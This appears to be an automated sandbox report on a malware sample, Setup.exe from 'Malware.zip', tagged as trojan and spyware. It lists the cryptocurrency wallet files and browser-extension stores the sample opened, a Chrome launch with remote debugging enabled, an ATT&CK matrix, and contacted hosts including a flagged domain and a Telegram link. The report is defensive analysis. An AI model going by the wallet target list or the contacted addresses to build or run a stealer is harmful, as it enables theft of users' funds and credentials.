        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: Yara matchFile source: 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6556, type: MEMORYSTR

        Remote Access Functionality

        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
        Source: Yara match | File source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        MITRE ATT&CK Matrix (one column per tactic; the number in parentheses is the count of matching signatures for that technique; unnumbered techniques are the matrix template's entries with no match in this analysis)

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
        Execution: Windows Management Instrumentation (1); Scheduled Task/Job; At; Cron; Launchd
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
        Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
        Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (11); Rundll32 (1); DLL Side-Loading (1); Software Packing
        Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
        Discovery: Security Software Discovery (111); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
        Collection: Data from Local System (3); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
        Command and Control: Encrypted Channel (1); Remote Access Software (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4)
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

        No Antivirus matches
        Source | Detection | Scanner | Label
        https://optimizationguide-pa.goog | 0% | Avira URL Cloud | safe
        https://restfulzpillow.bet/bWijt | 0% | Avira URL Cloud | safe
        https://restfulzpillow.bet/bWij | 0% | Avira URL Cloud | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        plus.l.google.com | 142.250.185.206 | true | false | (none) | high
        play.google.com | 142.250.186.142 | true | false | (none) | high
        t.me | 149.154.167.99 | true | false | (none) | high
        restfulzpillow.bet | 104.21.11.150 | true | true | (none) | unknown
        www.google.com | 142.250.74.196 | true | false | (none) | high
        apis.google.com | unknown | unknown | false | (none) | high
        Name | Malicious | Antivirus Detection | Reputation
        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | (none) | high
        https://restfulzpillow.bet/bWij | false | Avira URL Cloud: safe | unknown
        https://t.me/owowoowokk3j4 | false | (none) | high
        Name | Source | Malicious | Antivirus Detection | Reputation
                                                                  high
                                                                  https://mail.google.com/mail/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://calendar.google.comchrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1931768505.000069140158E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://unisolated.invalid/chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://drive.google.com/chrome.exe, 0000000D.00000002.2604043288.0000691401380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://mail.google.com/chat/:chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                              high
                                                                              https://www.google.com/chrome/tips/chrome.exe, 0000000D.00000002.2586377952.0000691400C2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599701490.00006914011AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2589255460.0000691400D54000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.google.com/?lfhs=2chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://mail.google.com/chat/download?usp=chrome_default_defaultultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)chrome.exe, 0000000D.00000002.2576136209.0000691400804000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.youtube.com/s/notifications/manifest/cr_install.htmlchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                            high
                                                                                            https://optimizationguide-pa.googchrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.youtube.com/?feature=ytcachrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/chrome/browser-tools/chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.youtube.com/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://docs.google.com/forms/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGAchrome.exe, 0000000D.00000002.2585522088.0000691400BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611297831.0000691401804000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/mQchrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://play.google.com/log?format=json&hasfast=truesyncdata.v1.AsyncDataService/GetAsyncDatachrome.exe, 0000000D.00000002.2543861158.000001B00DD57000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.google.com/chromebook?p=app_intentchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                              high
                                                                                                              https://docs.google.com/presentation/chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/tools/feedback/chrome/__submit99chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://chromewebstore.google.com/category/themeschrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://chrome.google.com/webstorechrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?uchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                          high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://support.google.com/chrome/answer/96817chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                              high
                                                                                                                              https://myaccount.google.com/shielded-email?utm_source=chromechrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://myaccount.google.com/shielded-email?utm_source=chrome2Bchrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-kchrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/chrome/#safechrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.youtube.com/chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/chrome/browser-features/chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000D.00000002.2594117821.0000691400F4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581929231.0000691400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://plus.google.comchromecache_67.14.drfalse
                                                                                                                                                high
                                                                                                                                                https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-kchrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://docs.google.com/spreadsheets/chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://play.google.com/log?format=json&hasfast=truechromecache_69.14.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/2Jchrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bchrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://m.google.com/devicemanagement/data/apichrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.google.com/document/installwebapp?usp=chrome_defaultultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://chromewebstore.google.com/chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://chromewebstore.google.com/category/extensionschrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2610261143.00006914016C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://clients4.google.com/chrome-syncchrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://docs.google.com/document/chrome.exe, 0000000D.00000002.2579719052.0000691400974000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://gemini.google.com/app?q=chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://clients6.google.comchromecache_67.14.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://google.com/chrome.exe, 0000000D.00000002.2562242297.000069140008E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://t.me/Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1828579447.00000000013BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://mail.google.com/mail/installwebapp?usp=chrome_defaultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
https://web.telegram.org | Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://restfulzpillow.bet/bWijt | Setup.exe, 0000000A.00000003.1867447694.0000000001402000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/J | chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.unicode.org/copyright.html | chrome.exe, 0000000D.00000002.2493174113.000001B005E26000.00000002.00000001.00040000.0000000E.sdmp | false | | high
https://drive.google.com/drive/installwebapp?usp=chrome_default | chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591800891.0000691400E6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstoreLDDiscover | chrome.exe, 0000000D.00000003.1900763625.0000691401292000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900676282.000069140113C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1932134139.000069140114A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1930172320.0000691401698000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/installwebapp?usp=chrome_default | chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/: | chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/installwebapp?usp=chrome_default | chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://passwords.google.comSaved | chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp | false | | high
https://lens.google.com/gen204 | chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/J | chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573256595.00006914006DC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://myactivity.google.com/ | chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900834316.000069140129D000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b | chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/?usp=installed_webapp | chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2604613278.00006914013C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573693016.0000691400708000.00000004.00001000.00020000.00000000.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
104.21.11.150 | restfulzpillow.bet | United States | 13335 | CLOUDFLARENETUS | true
142.250.74.196 | www.google.com | United States | 15169 | GOOGLEUS | false
IP
192.168.2.16
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1634564
Start date and time: 2025-03-11 00:41:00 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Malware.zip
Detection: MAL
Classification: mal76.troj.spyw.evad.winZIP@38/14@11/5
Cookbook Comments:
• Found application associated with file extension: .zip
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.186.142, 142.250.186.99, 142.250.186.174, 142.251.168.84, 142.250.185.110, 142.250.74.206, 142.250.185.163, 142.250.184.238, 142.250.186.74, 216.58.206.42, 172.217.18.106, 142.250.186.106, 142.250.185.138, 172.217.16.202, 142.250.185.202, 142.250.186.42, 142.250.185.170, 142.250.186.138, 142.250.185.106, 142.250.181.234, 216.58.212.170, 142.250.185.74, 172.217.18.10, 142.250.185.234, 142.250.184.202, 142.250.74.202, 142.250.186.170, 216.58.206.78, 142.250.185.238, 142.250.185.206, 23.60.203.209, 20.109.210.53
• Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, ogads-pa.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com, optimizationguide-pa.googleapis.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
19:41:46 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified
19:42:37 | API Interceptor | 3x Sleep call for process: Setup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.99 | http://45.142.208.144.sslip.io/blog/ | malicious | Unknown | telegram.org/img/emoji/40/F09F9889.png
149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico
149.154.167.99 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
149.154.167.99 | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/
